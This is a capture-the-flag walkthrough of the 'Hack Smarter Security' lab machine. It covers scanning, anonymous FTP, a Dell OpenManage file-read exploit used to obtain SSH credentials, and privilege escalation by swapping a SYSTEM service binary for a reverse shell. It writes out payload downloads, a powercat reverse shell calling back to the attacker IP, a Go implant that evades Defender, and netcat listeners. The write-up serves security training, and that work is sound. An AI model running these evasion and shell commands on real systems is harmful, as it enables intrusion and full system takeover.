Hack Smarter Security
Can you hack the hackers?
This work by Manav G Krishna is licensed under CC BY-NC 4.0 
Machine IP: 10.10.112.96
Nmap Scan:
nmap -p- -A -v --min-rate 100 -oN hacksmartersecurity_thm -Pn 10.10.112.96
Nmap scan report for 10.10.112.96
Host is up (0.15s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-28-23 02:58PM 3722 Credit-Cards-We-Pwned.txt
|_06-28-23 03:00PM 1022126 stolen-passport.png
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 0d:fa:da:de:c9:dd:99:8d:2e:8e:eb:3b:93:ff:e2:6c (RSA)
| 256 5d:0c:df:32:26:d3:71:a2:8e:6e:9a:1c:43:fc:1a:03 (ECDSA)
|_ 256 c4:25:e7:09:d6:c9:d9:86:5f:6e:8a:8b:ec:13:4a:8b (ED25519)
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: HackSmarterSec
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
1311/tcp open ssl/rxmon?
| ssl-cert: Subject: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Issuer: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-30T19:03:17
| Not valid after: 2025-06-29T19:03:17
| MD5: 4276:b53d:a8ab:fa7c:10c0:1535:ff41:2928
|_SHA-1: c44f:51f8:ed54:802f:bb94:d0ea:705d:50f8:fd96:f49f
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Strict-Transport-Security: max-age=0
| X-Frame-Options: SAMEORIGIN
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| vary: accept-encoding
| Content-Type: text/html;charset=UTF-8
| Date: Sat, 16 Mar 2024 06:17:01 GMT
| Connection: close
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
| <html>
| <head>
| <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
| <title>OpenManage™</title>
| <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
| <style type="text/css"></style>
| <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
| HTTPOptions:
| HTTP/1.1 200
| Strict-Transport-Security: max-age=0
| X-Frame-Options: SAMEORIGIN
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| vary: accept-encoding
| Content-Type: text/html;charset=UTF-8
| Date: Sat, 16 Mar 2024 06:17:07 GMT
| Connection: close
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
| <html>
| <head>
| <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
| <title>OpenManage™</title>
| <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
| <style type="text/css"></style>
|_ <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HACKSMARTERSEC
| NetBIOS_Domain_Name: HACKSMARTERSEC
| NetBIOS_Computer_Name: HACKSMARTERSEC
| DNS_Domain_Name: hacksmartersec
| DNS_Computer_Name: hacksmartersec
| Product_Version: 10.0.17763
|_ System_Time: 2024-03-16T06:17:37+00:00
|_ssl-date: 2024-03-16T06:17:41+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=hacksmartersec
| Issuer: commonName=hacksmartersec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-15T06:03:53
| Not valid after: 2024-09-14T06:03:53
| MD5: 8383:3da2:bc78:7d18:98f9:aaf9:d5b0:c626
|_SHA-1: 2012:fcc6:d0ef:d9db:67f0:e3c9:8554:6dfa:26c0:68dd
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1311-TCP:V=7.94SVN%T=SSL%I=7%D=3/16%Time=65F5395C%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,1089,"HTTP/1\.1\x20200\x20\r\nStrict-Transport-Securi
SF:ty:\x20max-age=0\r\nX-Frame-Options:\x20SAMEORIGIN\r\nX-Content-Type-Op
SF:tions:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nvary:\x20
SF:accept-encoding\r\nContent-Type:\x20text/html;charset=UTF-8\r\nDate:\x2
SF:0Sat,\x2016\x20Mar\x202024\x2006:17:01\x20GMT\r\nConnection:\x20close\r
SF:\n\r\n<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20
SF:Strict//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-strict\.dtd\
SF:">\r\n<html>\r\n<head>\r\n<META\x20http-equiv=\"Content-Type\"\x20conte
SF:nt=\"text/html;\x20charset=UTF-8\">\r\n<title>OpenManage™</title>
SF:\r\n<link\x20type=\"text/css\"\x20rel=\"stylesheet\"\x20href=\"/oma/css
SF:/loginmaster\.css\">\r\n<style\x20type=\"text/css\"></style>\r\n<script
SF:\x20type=\"text/javascript\"\x20src=\"/oma/js/prototype\.js\"\x20langua
SF:ge=\"javascript\"></script><script\x20type=\"text/javascript\"\x20src=\
SF:"/oma/js/gnavbar\.js\"\x20language=\"javascript\"></script><script\x20t
SF:ype=\"text/javascript\"\x20src=\"/oma/js/Clarity\.js\"\x20language=\"ja
SF:vascript\"></script><script\x20language=\"javascript\">\r\n\x20")%r(HTT
SF:POptions,1089,"HTTP/1\.1\x20200\x20\r\nStrict-Transport-Security:\x20ma
SF:x-age=0\r\nX-Frame-Options:\x20SAMEORIGIN\r\nX-Content-Type-Options:\x2
SF:0nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nvary:\x20accept-en
SF:coding\r\nContent-Type:\x20text/html;charset=UTF-8\r\nDate:\x20Sat,\x20
SF:16\x20Mar\x202024\x2006:17:07\x20GMT\r\nConnection:\x20close\r\n\r\n<!D
SF:OCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Strict//E
SF:N\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-strict\.dtd\">\r\n<ht
SF:ml>\r\n<head>\r\n<META\x20http-equiv=\"Content-Type\"\x20content=\"text
SF:/html;\x20charset=UTF-8\">\r\n<title>OpenManage™</title>\r\n<link
SF:\x20type=\"text/css\"\x20rel=\"stylesheet\"\x20href=\"/oma/css/loginmas
SF:ter\.css\">\r\n<style\x20type=\"text/css\"></style>\r\n<script\x20type=
SF:\"text/javascript\"\x20src=\"/oma/js/prototype\.js\"\x20language=\"java
SF:script\"></script><script\x20type=\"text/javascript\"\x20src=\"/oma/js/
SF:gnavbar\.js\"\x20language=\"javascript\"></script><script\x20type=\"tex
SF:t/javascript\"\x20src=\"/oma/js/Clarity\.js\"\x20language=\"javascript\
SF:"></script><script\x20language=\"javascript\">\r\n\x20");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 153.05 ms 10.11.0.1
2 153.20 ms 10.10.112.96
From the scan we straight away notice that there is Anonymous FTP Login and we can also see the listing.
Connecting to the FTP Server:
Command :
ftp 10.10.112.96
We can connect with the Name being anonymous and the Password can be left empty or we can use anonymous.
Downloading the files from the server:
We notice that the stolen-passport.png didn't get transferred correctly. This is cause image files are usually stored in binary format. ASCII mode is the default for the majority of FTP servers and to transfer image files without any corruption we switch to the Binary mode.
Switching to Binary mode :
Now the .png file has downloaded successfully.
Checking out the files:
The first file - Credit-Cards-We-Pwned.txt has some credit card information:
There are more lines in that file in a similar fashion.
The second file - stolen-passport.png :
We can run exiftool to see if we get some metadata from the image:
Command:
exiftool stolen-passport.png
No good information in here.
Checking out port 80:
We can see what Wappalyzer tells us:
We now know that the web server running is IIS.
We have a contact form here:
Testing out a basic XSS Payload:
Now let's set up a netcat listener on port 80. If the above payload works we should be getting a connection back on our listener which basically shows that the server has reached out to our machine. The IP specified in the payload is the tun0 interface IP.
But unfortunately we don't get any connection on the listener.
We can now do some directory busting to see if we get any juicy paths:
Command:
feroxbuster -u http://10.10.112.96
Nothing interesting here either.
Checking out port 1311:
SpeedGuide tells us that this port is used by Dell OpenManage HTTPS .
Upon googling - port 1311 vulnerability, we come across this result from tenable:
Let's keep this aside for now and check out the website:
The certificate didn't have anything much in it.
We are presented with a Dell OpenManage Server Administrator (OMSA) login page. Dell EMC OpenManage Enterprise is a unified systems management console designed to take complexity out of the IT administration experience.
Note:
Accessing the port over HTTP gave us this: Bad Request This combination of host and port requires TLS. This basically shows that we had to access it via HTTPS which is what we had done.
The stuffs present in the tenable research blog matches with what we see in the login page. We have the exact dialog boxes as mentioned in the blog. It is a CVE and it says - An unauthenticated remote attacker can login to OMSA as admin without knowing a correct OS username and password on that system
This indeed sounds juicy, let's give it a try.
Following the POC:
But this didn't work as expected as it gave us a Login failed error:
Moving on.
We notice there is an About section. Let us check it out:
And now we have the version: 9.4.0.2
Note: The About page does take some time to load, so just wait it out.
Now let us use this version to find exploits:
Upon googling - dellemc 9.4.0.2 exploits we get this result from Rhino Security Labs:
It is a file read vulnerability in Dell OpenManage Server Administrator (OMSA).
The blog explains the vulnerability really well and there is also a POC in there:
Usage:
Command:
python3 exploit.py 10.11.75.84 10.10.112.96:1311
We know from before that the web server running is IIS and also from the Nmap Scan we can see ports: 22 (SSH) & 3389 (RDP) open. Keeping all this in mind the main file that we could try to read is the web.config file. It is an XML file containing rules for a particular site (or directory) on a web server.
This file is located within the C:\inetpub\wwwroot which is the default root directory for websites hosted on IIS.
In our case the name of the website hosted on the IIS web server is - hacksmartersec. We can see this in the Nmap Scan under the 1311 port information (commonName=hacksmartersec)
The exact location: C:\inetpub\wwwroot\hacksmartersec\web.config
Let us read this file now:
We can see that we have a password for the username - tyler
We can now SSH in as this user:
Command:
ssh tyler@10.10.112.96
We can find the user flag in the Desktop folder of tyler.
Checking if we are part of any interesting groups or if we have any juicy privileges:
Command:
whoami /all
There is nothing of interest.
Checking if Defender is active:
Command:
sc query WinDefend
And yes, we can see that the STATE is RUNNING.
We can still try to execute scripts like winPEAS.ps1 , PrivescCheck.ps1 etc. to find vulnerabilities if any:
Also tyler had Full Control (F) on the Desktop folder:
Command:
icacls .
Full Control (F) refers to the highest level of permissions that can be granted to a user or group in a Windows security context. When a user or group is assigned Full Control permissions, they have complete control over the object to which the permissions apply.
So we can put our scripts in the Desktop folder.
Executing winPEAS.ps1:
Upon trying to run the script post sending it via wget (After setting up a python server on port 4545 - python3 -m http.server 4545), Defender was flagging it as a virus. Also any port can be used to serve the file.
Command:
wget http://10.11.75.84:4545/winpeas.ps1 -o winpeas.ps1
We can now try to do an AMSI Bypass. For more information check this out:
The script now starts running without any issues.
Note:
Running WinPEAS was taking so much time and it wasn't giving me any good information. I then decided to switch to PrivescCheck. Also the .exe of WinPEAS and a few other scripts that I tested were getting flagged even after running the command that could bypass AMSI. I have shown only the one's that worked for me in this writeup.
Executing PrivescCheck.ps1:
When trying to run it, it did without any issues. It wasn't getting flagged by Defender. This is actually one of the few scripts that usually don't get flagged. This time I set up a python server on port 4646.
Command:
wget http://10.11.75.84:4646/PrivescCheck.ps1 -o PrivescCheck.ps1
Command:
. .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,CSV,HTML,XML
Now we just wait for it to find something worthy that could help us in rooting the machine.
It has found a vulnerability that is rated High that let's us Privilege Escalate as this service is running under the SYSTEM account and we can start and stop the service:
Name : spoofer-scheduler
ImagePath : C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe
User : LocalSystem
ModifiablePath : C:\Program Files (x86)\Spoofer
IdentityReference : BUILTIN\Users
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ListDirectory, AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, AddFile, ReadExtendedAttributes,
DeleteChild, Traverse
Status : Running
UserCanStart : True
UserCanStop : TrueExplanation:
Name: Indicates the name of the service or process, which in this case is spoofer-scheduler.
ImagePath: Specifies the path to the executable file (spoofer-scheduler.exe) associated with the service. It's located in the directory C:\Program Files (x86)\Spoofer.
User: Indicates the user account under which the service is running. In this case, it's running under the LocalSystem account, which is a built-in Windows account with high privileges.
ModifiablePath: Specifies the path where the service's files and configurations are stored. In this case, it's located in the directory C:\Program Files (x86)\Spoofer.
IdentityReference: Specifies the security principal or group that has permissions to access or manage the service. In this case, it's the Users group (BUILTIN\Users).
Permissions: Lists the specific permissions granted to the Users group for this service. These permissions include WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ListDirectory, AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, AddFile, ReadExtendedAttributes, DeleteChild, and Traverse.
Status: Indicates the current status of the service. In this case, it's Running, meaning the service is currently running.
UserCanStart: Specifies whether users have permission to start the service. It's set to True, indicating that users can start the service.
UserCanStop: Specifies whether users have permission to stop the service. It's also set to True, indicating that users can stop the service.
Privilege Escalation to SYSTEM:
Firstly let us get into the folder where the spoofer-scheduler.exe is located:
From the PrivEscCheck output we know that the service - spoofer-scheduler is currently running.
Thinking Process:
Since we know the service is running under the SYSTEM account and that we have Write permissions on that folder where the spoofer-scheduler.exe is located (based on the PrivEscCheck output), we can remove and replace that binary with our reverse shell binary having the same name. Since the service is currently running, we would have to stop it first to remove the file and once replaced, post starting the service we should be getting a shell as SYSTEM.
Confirming that we can write into the folder:
Command:
icacls .
The user that we have a hold on - tyler if we recollect is part of the BUILTIN\Users group and member of this group has Full Control (F) on the Spoofer folder where the binary is located and that users belonging to this group can manage the service.
Stopping the spoofer-scheduler service:
Command:
Stop-Service -Name "spoofer-scheduler"Confirming the same:
Command:
Get-Service -Name "spoofer-scheduler"
We can see that the Status is Stopped.
Now we can remove the original spoofer-scheduler.exe:
Command:
rm spoofer-scheduler.exe
Now we can make use of a tool called powercat for the shell:
Command:
powercat -c 10.11.75.84 -p 4444 -e cmd -g > test.ps1This basically creates a reverse shell.
This PowerShell script has to be converted to an .exe format. To do this we will be using this online tool:
Now we send the spoofer-scheduler.exe containing the shell to the machine. The python server being used to serve the file is the one on port 4545 itself:
Command:
wget http://10.11.75.84:4545/spoofer-scheduler.exe -o spoofer-scheduler.exe
Setting up a netcat listener on port 4444:
Command:
nc -lnvp 4444
Starting the spoofer-scheduler service:
Command:
Start-Service -Name "spoofer-scheduler"
Let us go back and check our listener:
We have successfully got a shell as SYSTEM . The shell will die pretty soon here.
The last answer we can find in this path:
C:\Users\Administrator\Desktop\Hacking-Targets\hacking-targets.txt
Note:
Now I will be showing an other script or method that I used to bypass Defender to get a SYSTEM shell which doesn't die.
Go Script to Bypass Defender:
We have to firstly clone the repo:
Command:
git clone https://github.com/daniellowrie/update_scriptOnce that is done, we can start to get it working:
Command:
go run SecUp.go 10.11.75.84This basically starts the main engine and it generates the payload or the implant along with a few other files that it needs to function as intended and it also sets up a HTTP server to serve the needed files:
Out of the attack files that it generates, the update_script.go is the payload file. It also sets the listening port as 443 by default which helps in evading any detections in place most of the times.
So we set up a netcat listener on port 443:
Command:
nc -lnvp 443
Compiling the .go file to an .exe file:
Command:
GOOS=windows go build update_script.goThis generates a file named - update_script.exe:
Now we have to change the file name from update_script.exe to spoofer-scheduler.exe as that was the binary in question based on the PrivEscCheck output:
This file must be now served or sent to the machine. This time I set up a python server on port 4848 and before we send the file we have to start the spoofer-scheduler service which is stopped at the moment (Apparently since starting it triggered the shell previously, the service was actually in the STOPPED state after the shell died). Since spoofer-scheduler.exe is already present on the machine from what we had done when using powercat, it must be removed and replaced with the new one.
Command:
wget http://10.11.75.84:4848/spoofer-scheduler.exe -o spoofer-scheduler.exeStarting the spoofer-scheduler service:
Let us now start the service. For starting the service in PowerShell check the command mentioned in the Privilege Escalation section.
We can also start it in cmd like this:
Command:
sc start spoofer-schedulerThe moment we start it, we can see the files that the Go script needs to work as needed, being served from the HTTP server that the script had set up initially:
Checking out our listener:
Yet again we have a SYSTEM shell. This shell doesn't die like how the powercat shell did. The Nim shell that I have mentioned below also did die soon.
An other way to root this machine is by using a reverse shell written in Nim that goes undetected by Defender, like how powercat and the Go script generated payload went through without getting removed. Tyler himself has made a video on this, do check that out:
Room solved!!
Last updated